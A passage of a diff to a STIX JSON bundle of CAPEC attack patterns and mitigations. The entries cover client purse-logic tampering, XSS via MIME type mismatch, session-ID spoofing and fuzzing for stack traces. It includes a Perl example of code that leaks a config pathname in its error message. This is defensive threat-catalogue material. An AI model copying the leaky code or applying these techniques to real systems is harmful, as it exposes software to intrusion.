"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "name": "coa-207-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", "type": "course-of-action", - "id": "course-of-action--b4276eaa-9ab8-4d86-bc11-6daaca82ef38" + "id": "course-of-action--ca984166-6914-410d-bb5a-97d296f8a505" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2019-04-04T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--ee1322d2-b260-4fef-82d0-574b11c81d7c", - "source_ref": "course-of-action--b4276eaa-9ab8-4d86-bc11-6daaca82ef38", + "id": "relationship--d6d51161-5f82-4300-b109-a5e2b2b14bb6", + "source_ref": "course-of-action--ca984166-6914-410d-bb5a-97d296f8a505", "relationship_type": "mitigates", - "target_ref": "attack-pattern--73c0671d-58fc-4349-a28d-e3d9e74c160e" + "target_ref": "attack-pattern--26cc0860-885f-48e0-9e20-773b4a0d3cd7" }, { "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -11286,15 +11402,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--a988de36-e4b7-49e3-8ac8-76b5c2cf231c" + "id": "attack-pattern--d8d1a4fd-dd67-42ee-a274-9f7c4064283e" }, { "name": "XSS Using MIME Type Mismatch", "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -11340,15 +11457,16 @@ "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0288a170-2b28-4394-b431-c4838d52ee15" + "id": "attack-pattern--37922b04-8f75-4faa-ac2c-45eed4d17a3f" }, { "name": "Exploitation of Trusted Credentials", "description": "Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", @@ -11440,190 +11558,191 @@ "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.\n A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "id": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: utilize strong federated identity such as SAML to encrypt and sign identity tokens in transit.", "type": "course-of-action", - "id": "course-of-action--c2798c06-2e90-4eee-bf7c-46aa2876980f" + "id": "course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4d8c04ca-c701-4736-8407-53a5e097ab66", - "source_ref": "course-of-action--c2798c06-2e90-4eee-bf7c-46aa2876980f", + "id": "relationship--fdb93c2f-f884-40a4-89c2-5cf4510641f0", + "source_ref": "course-of-action--9a510254-3a3f-4ed7-9e9b-edcc98b04b01", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Use industry standards session key generation mechanisms that utilize high amount of entropy to generate the session key. Many standard web and application servers will perform this task on your behalf.", "type": "course-of-action", - "id": "course-of-action--12956c3a-c202-4aa4-9e2d-c011a0fd943f" + "id": "course-of-action--b4faff18-8772-40e7-babb-756dd6a05950" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--02c44393-1a07-4ddd-b788-0f22520992bb", - "source_ref": "course-of-action--12956c3a-c202-4aa4-9e2d-c011a0fd943f", + "id": "relationship--5223036e-d72f-458a-b15e-7d23f915e585", + "source_ref": "course-of-action--b4faff18-8772-40e7-babb-756dd6a05950", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: If the session identifier is used for authentication, such as in the so-called single sign on use cases, then ensure that it is protected at the same level of assurance as authentication tokens.", "type": "course-of-action", - "id": "course-of-action--06dba374-11b4-4f07-9a08-2e57abb4560b" + "id": "course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--196e283c-d044-48cc-ae97-4c4fbb6c4934", - "source_ref": "course-of-action--06dba374-11b4-4f07-9a08-2e57abb4560b", + "id": "relationship--7c272f72-b4b5-498c-ac80-301414134dd5", + "source_ref": "course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-3", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: If the web or application server supports it, then encrypting and/or signing the session ID (such as cookie) can protect the ID if intercepted.", "type": "course-of-action", - "id": "course-of-action--fb9c78f2-5436-4657-86e8-18710cc31e3f" + "id": "course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--a8c40781-227e-4b1a-a233-15d966e77ad7", - "source_ref": "course-of-action--fb9c78f2-5436-4657-86e8-18710cc31e3f", + "id": "relationship--fa4ed481-62ad-4d79-a2fc-64104574eeff", + "source_ref": "course-of-action--da64dfaa-01b4-4658-9671-e5ba690138d4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Use strong session identifiers that are protected in transit and at rest.", "type": "course-of-action", - "id": "course-of-action--b4aeaa24-abbe-41e0-8d56-9d217787bb57" + "id": "course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--dc2c625a-24f7-439f-8a66-c50ba592a1be", - "source_ref": "course-of-action--b4aeaa24-abbe-41e0-8d56-9d217787bb57", + "id": "relationship--8e7b2d66-fa6a-4ae8-ad81-c11393d31472", + "source_ref": "course-of-action--9dab8931-2b67-4fa0-9a9e-80ae1a738c4b", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Utilize a session timeout for all sessions, for example 20 minutes. If the user does not explicitly logout, the server terminates their session after this period of inactivity. If the user logs back in then a new session key is generated.", "type": "course-of-action", - "id": "course-of-action--4e179d07-83c3-42b6-a222-73f0aa6f540f" + "id": "course-of-action--04440c70-46f9-4007-9983-336aa6149e9f" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--fe0300cb-6bb3-4d38-b8ce-ed59a26d2c14", - "source_ref": "course-of-action--4e179d07-83c3-42b6-a222-73f0aa6f540f", + "id": "relationship--78b35bc5-b6e0-460c-9fa3-fc47a4ff64f9", + "source_ref": "course-of-action--04440c70-46f9-4007-9983-336aa6149e9f", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "name": "coa-21-6", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Implementation: Verify of authenticity of all session IDs at runtime.", "type": "course-of-action", - "id": "course-of-action--0b75ab56-a946-47a3-a820-5e749b413343" + "id": "course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2015-11-09T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b0e66bfc-8915-492a-a2c8-7f045ad226ca", - "source_ref": "course-of-action--0b75ab56-a946-47a3-a820-5e749b413343", + "id": "relationship--14a6218e-49e6-4932-a764-e62962e4b779", + "source_ref": "course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3", "relationship_type": "mitigates", - "target_ref": "attack-pattern--668af892-3d02-40aa-9835-c93ef6028148" + "target_ref": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70" }, { "name": "DEPRECATED: Leveraging web tools (e.g. Mozilla's GreaseMonkey, Firebug) to change application behavior", "description": "This attack pattern has been deprecated as it was deemed not to be a legitimate attack pattern.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -11636,15 +11755,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c3f93940-e74e-4127-ac34-486c27ecd91c" + "id": "attack-pattern--ffae340f-2fbb-4ac5-88df-6ac596575620" }, { "name": "Functionality Misuse", "description": "An adversary leverages a legitimate capability of an application in such a way as to achieve a negative technical impact. The system functionality is not altered or modified but used in a way that was not intended. This is often accomplished through the overuse of a specific functionality or by leveraging functionality with design flaws that enables the adversary to gain access to unauthorized, sensitive data.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -11677,65 +11797,66 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Stable", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--de272c64-c6a0-4701-ac28-225e3085975b" + "id": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-212-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Perform comprehensive threat modeling, a process of identifying, evaluating, and mitigating potential threats to the application. This effort can help reveal potentially obscure application functionality that can be manipulated for malicious purposes.", "type": "course-of-action", - "id": "course-of-action--6464e9dd-4d27-4686-8ae2-69cce8e0d850" + "id": "course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--b1bde387-57d5-4d1e-af69-f4ea35d08510", - "source_ref": "course-of-action--6464e9dd-4d27-4686-8ae2-69cce8e0d850", + "id": "relationship--a8bb5bce-434d-461f-812c-eb23c148b075", + "source_ref": "course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd", "relationship_type": "mitigates", - "target_ref": "attack-pattern--de272c64-c6a0-4701-ac28-225e3085975b" + "target_ref": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-212-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "When implementing security features, consider how they can be misused and compromised.", "type": "course-of-action", - "id": "course-of-action--156c9700-a3d4-4a29-b6ac-8b65b37b7bdd" + "id": "course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--4824b50d-dec0-485b-ad9a-891fce384b77", - "source_ref": "course-of-action--156c9700-a3d4-4a29-b6ac-8b65b37b7bdd", + "id": "relationship--d822a68b-f0d2-4ae6-8b1c-74f0fed06822", + "source_ref": "course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96", "relationship_type": "mitigates", - "target_ref": "attack-pattern--de272c64-c6a0-4701-ac28-225e3085975b" + "target_ref": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538" }, { "name": "DEPRECATED: Directory Traversal", "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-126 : Path Traversal\". Please refer to this other CAPEC going forward.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2017-08-04T00:00:00.000Z", @@ -11748,15 +11869,16 @@ ], "x_capec_abstraction": "Standard", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--d5e68894-30d4-48ee-a1ad-4ba4ea7615c4" + "id": "attack-pattern--e3a9da59-fe22-4b97-b493-ffad8011fed6" }, { "name": "Fuzzing for garnering J2EE/.NET-based stack traces, for application mapping", "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes any stack traces produced by error messages. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to cause the targeted application to return an error including a stack trace, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. The stack trace enumerates the chain of methods that led up to the point where the error was encountered. This can not only reveal the names of the methods (some of which may have known weaknesses) but possibly also the location of class files and libraries as well as parameter values. In some cases, the stack trace might even disclose sensitive configuration or user information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2014-06-23T00:00:00.000Z", @@ -11786,15 +11908,16 @@ ], "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--58708d6d-0da0-4d5c-be1d-fcd04ffa9299" + "id": "attack-pattern--b7261469-6a57-41f7-9801-2c5d162a3529" }, { "name": "Fuzzing and observing application log data/errors for application mapping", "description": "An attacker sends random, malformed, or otherwise unexpected messages to a target application and observes the application's log or error messages returned. Fuzzing techniques involve sending random or malformed messages to a target and monitoring the target's response. The attacker does not initially know how a target will respond to individual messages but by attempting a large number of message variants they may find a variant that trigger's desired behavior. In this attack, the purpose of the fuzzing is to observe the application's log and error messages, although fuzzing a target can also sometimes cause the target to enter an unstable state, causing a crash. By observing logs and error messages, the attacker can learn details about the configuration of the target application and might be able to cause the target to disclose sensitive information.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -11836,143 +11959,144 @@ "\n The following code generates an error message that leaks the full pathname of the configuration file.\n $ConfigDir = \"/home/myprog/config\";$uname = GetUserInput(\"username\");ExitError(\"Bad hacker!\") if ($uname !~ /^\\w+$/);$file = \"$ConfigDir/$uname.txt\";if (! (-e $file)) { ExitError(\"Error: $file does not exist\"); }...\n If this code is running on a server, such as a web application, then the person making the request should not know what the full pathname of the configuration directory is. By submitting a username that does not produce a $file that exists, an attacker could get this pathname. It could then be used to exploit path traversal or symbolic link following problems that may exist elsewhere in the application.\n " ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "id": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-215-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: Construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are catalogued and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", "type": "course-of-action", - "id": "course-of-action--5782960d-d8c7-4a19-8cc9-a8e18e866d19" + "id": "course-of-action--26e81028-3a75-4321-94a2-71630c84ef29" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--be184b93-6140-4b15-bd26-976271c7f855", - "source_ref": "course-of-action--5782960d-d8c7-4a19-8cc9-a8e18e866d19", + "id": "relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a", + "source_ref": "course-of-action--26e81028-3a75-4321-94a2-71630c84ef29", "relationship_type": "mitigates", - "target_ref": "attack-pattern--9cb29d9c-a2fa-4593-a31b-95c1abdcfb35" + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-215-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Design: wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", "type": "course-of-action", - "id": "course-of-action--9582c96c-ccdf-4e88-b99d-bca746f4809e" + "id": "course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5c828adf-4ead-4965-96d7-abae06f166ca", - "source_ref": "course-of-action--9582c96c-ccdf-4e88-b99d-bca746f4809e", + "id": "relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb", + "source_ref": 